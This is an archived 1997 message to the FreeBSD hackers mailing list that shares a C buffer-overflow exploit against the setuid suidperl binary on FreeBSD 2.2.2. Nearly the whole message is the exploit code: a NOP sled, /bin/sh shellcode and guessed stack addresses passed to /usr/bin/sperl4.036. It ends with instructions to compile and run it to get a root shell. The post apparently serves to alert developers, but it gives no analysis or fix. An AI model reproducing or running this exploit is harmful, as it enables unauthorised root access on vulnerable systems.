Date: Mon, 4 Aug 1997 10:12:18 +0000 (GMT) From: "Lenzi, Sergio" <lenzi@bsi.com.br> To: hackers@freebsd.org Subject: Security hole script. Message-ID: <Pine.BSF.3.96.970804100920.6279A-100000@sergio>
next in thread | raw e-mail | index | archive | help
Hello all.
Here is the "script" that opens a hole in our FreeBSD 2.2.2...
from a friend of mine (lgarcia@netlan.com.br)
---------------------------cut-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 1400
#define OFFSET 600
char *get_esp(void) {
asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];
main(int argc, char *argv[])
{
int i;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
for(i=0+1;i<BUFFER_SIZE-4;i+=4)
*(char **)&buf[i] = get_esp() - OFFSET;
memset(buf,0x90,768+1);
memcpy(&buf[768+1],execshell,strlen(execshell));
buf[BUFFER_SIZE-1]=0;
execl("/usr/bin/sperl4.036", "/usr/bin/sperl4.036", buf, NULL);
}
---------------------------------------------------------cut---------
install this script, do a make and run it.
should return a root shell.
Sergio Lenzi.
Unix consult.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.970804100920.6279A-100000>